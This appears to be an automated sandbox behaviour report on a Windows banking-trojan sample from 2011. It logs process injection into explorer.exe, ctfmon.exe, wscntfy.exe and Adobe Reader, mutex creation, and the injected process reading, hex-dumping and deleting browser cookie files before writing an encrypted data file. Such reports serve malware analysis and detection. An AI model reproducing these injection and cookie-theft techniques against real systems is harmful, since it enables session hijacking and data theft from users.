Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 2E60000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2613768811
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2613792520
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2613793777
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2613794130
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2613794487
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2613794824
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2613828556
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2613829159
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2615588806
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2615591424
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2615592438
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2615602810
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D558-B06DC413937F} success or wait 2615604896
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 1480000 Length: 13F1FC Allocation Type: null Protection: page execute and read and write success or wait 2615605420
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 1480000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2629155736
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 14B01F0 Length: 4 Value: 00 00 00 00 success or wait 2629249434
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 14B0204 Length: 4 Value: 00 00 48 01 success or wait 2629331255
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 14B06C8 Length: 4 Value: B8 06 00 00 success or wait 2629363617
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 14B06CC Length: 4 Value: 00 06 00 00 success or wait 2629380448
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2636239953
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2636243553
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2636244419
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} success or wait 2636245282
Memory allocated PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 1110000 Length: 13F1FC Allocation Type: null Protection: page execute and read and write success or wait 2636247027
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 1110000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2638650109
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 11401F0 Length: 4 Value: 00 00 00 00 success or wait 2638683587
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 1140204 Length: 4 Value: 00 00 11 01 success or wait 2638725012
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 11406C8 Length: 4 Value: 44 01 00 00 success or wait 2638781388
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 11406CC Length: 4 Value: A4 01 00 00 success or wait 2638795829
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} success or wait 2641994422
Memory allocated PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 13F1FC Allocation Type: null Protection: page execute and read and write success or wait 2641997549
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2645506657
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: B101F0 Length: 4 Value: 00 00 00 00 success or wait 2645540836
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: B10204 Length: 4 Value: 00 00 AE 00 success or wait 2645551740
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: B106C8 Length: 4 Value: 9C 00 00 00 success or wait 2645585818
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: B106CC Length: 4 Value: A0 00 00 00 success or wait 2645616180
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2664266623
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2664267612
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-955B-B06D8410937F} object name exists 2664269055
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} success or wait 2664288211
Memory allocated PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FC0000 Length: 13F1FC Allocation Type: null Protection: page execute and read and write success or wait 2664288753
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FC0000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2664354674
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FF01F0 Length: 4 Value: 00 00 00 00 success or wait 2664465851
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FF0204 Length: 4 Value: 00 00 FC 05 success or wait 2664564290
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FF06C8 Length: 4 Value: 9C 03 00 00 success or wait 2664635398
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FF06CC Length: 4 Value: 94 03 00 00 success or wait 2664673183
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615F-B06D7014937F} object name exists 2667094754
System info queried Type: ProcessInformation success or wait 2667096251
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 2E60000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2667106131
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2667108734
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2667109982
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2667110997
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2667111908
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2667112810
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2667113708
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2667114661
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2667115599
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2667116515
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2667117454
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2667118371
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2667119684
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2667120681
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2667121857
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2667123677
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2667124604
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-955B-B06D8410937F} object name exists 2667125968
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615F-B06D7014937F} object name exists 2667127262
Process terminated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 2667130418
+ Sections
+ General
Start time: 05:44:37
Start date: 08/12/2011
Path: C:\WINDOWS\explorer.exe
Commandline: C:\WINDOWS\Explorer.EXE
Imagebase: 0x1000000
File size: 1033728 bytes
MD5 hash: 12896823FB95BFB3DC9B46BCAEDC9923
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 149A4FF
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 149FD40
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@disqus[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@exp.www.msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@oldapps[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@quantserve[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@questionmarket[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@twitter[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 1 149F181
+ File deleted
File Path Completion Count Source Address
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 1 1491D4D
+ File renamed
Old File Path New File Path Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi unknown success or wait 1 149FDB7
+ File written
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi none 5 EE BB DE 55 00 success or wait 1 149F349
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi none 4099 6F DD 26 BE 4C C1 4E 3F BE 2B 91 B4 8E 98 0F 2F E4 BB FE 5C 48 7B EA 9A 49 C9 0D 0B 21 4A 05 9D 73 2A A0 0A 6C D4 79 CD 75 A8 18 18 09 41 E5 AA AA 1F 1D 75 D6 51 CB 6A CB AC C2 C5 D1 1B 24 73 8C B2 0A 1D 43 F7 9C 9B 67 44 8D D5 59 3E 1C A1 79 19 A0 B9 29 C0 7C FA 8A 60 C3 8F BC DE B6 20 7A 39 6B 47 success or wait 1 149F362
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt none 169 75 0A 34 65 64 37 66 30 66 62 63 37 62 36 64 0A 61 64 2E 77 73 6F 64 2E 63 6F 6D 2F 0A 31 30 32 34 0A 34 32 31 34 36 35 36 0A 33 30 31 39 37 39 36 34 0A 34 36 37 34 30 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 69 5F 31 0A 33 33 3A 32 33 37 33 3A 31 32 32 35 3A 30 3A 30 3A 35 37 37 32 35 3A 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt none 228 75 69 64 0A 34 65 64 37 65 36 61 30 38 34 33 62 62 61 64 63 0A 61 64 64 74 68 69 73 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 39 32 39 32 36 34 38 39 36 0A 33 30 33 33 38 37 37 34 0A 34 36 35 35 31 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A 75 76 63 0A 33 7C 34 38 0A 61 64 64 74 68 69 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt none 232 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 30 32 32 37 39 33 35 36 7C 73 65 73 73 69 6F 6E 23 31 33 30 32 32 37 39 32 34 30 39 31 38 2D 39 35 32 36 31 35 23 31 33 30 32 32 38 31 31 35 36 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 31 38 34 39 37 36 38 34 34 38 0A 33 30 31 34 34 30 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt none 232 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 32 31 30 31 31 39 36 32 7C 73 65 73 73 69 6F 6E 23 31 33 32 31 30 31 31 39 30 31 36 37 39 2D 32 31 30 36 33 34 23 31 33 32 31 30 31 33 37 36 32 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 32 39 31 31 31 35 33 34 30 38 0A 33 30 31 38 37 36 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt none 102 4D 55 49 44 0A 39 37 41 30 45 44 32 45 45 39 33 35 34 37 33 44 38 37 46 43 37 45 37 30 37 32 35 45 45 30 35 37 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 32 38 35 30 36 31 36 33 32 0A 33 30 31 38 34 33 38 33 0A 32 37 31 36 30 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt none 101 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 33 33 31 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt none 189 4D 55 49 44 0A 33 43 41 41 41 32 42 34 37 42 36 42 36 44 32 39 31 45 45 30 41 30 30 46 37 38 36 42 36 44 43 44 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 34 38 32 30 30 30 38 39 36 0A 33 30 33 33 38 33 39 39 0A 32 36 33 31 34 32 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt none 190 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 39 37 37 35 36 30 35 37 36 0A 33 30 33 33 38 35 36 39 0A 32 32 35 39 31 39 37 33 36 30 0A 33 30 31 39 31 37 31 35 0A 2A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt none 291 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A 53 52 43 48 44 0A success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt none 204 53 52 43 48 55 53 52 0A 41 55 54 4F 52 45 44 49 52 3D 30 26 47 45 4F 56 41 52 3D 26 44 4F 42 3D 32 30 31 31 30 35 32 33 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt none 197 53 52 43 48 44 0A 4D 53 3D 32 30 36 30 34 38 36 26 44 3D 32 30 36 30 34 36 31 26 41 46 3D 4D 53 4E 30 30 35 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 34 37 32 38 35 34 39 31 32 0A 33 30 33 33 38 35 37 38 0A 34 36 37 34 30 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 53 52 43 48 55 53 52 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt none 208 53 52 4D 5F 41 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 63 2E 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 39 37 37 35 36 30 35 37 36 0A 33 30 33 33 38 35 36 39 0A 32 32 35 39 31 39 37 33 36 30 0A 33 30 31 39 31 37 31 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt none 210 53 52 4D 5F 41 0A 31 42 45 32 35 42 38 39 31 36 39 43 36 37 32 38 32 46 33 39 35 39 33 32 31 32 39 43 36 37 44 41 0A 63 2E 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 31 32 39 37 37 35 36 38 30 30 0A 33 30 33 33 38 35 37 35 0A 32 35 39 33 31 34 33 35 38 34 0A 33 30 31 39 31 37 success or wait 1 1491C56
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt none 69 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 34 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1491C56
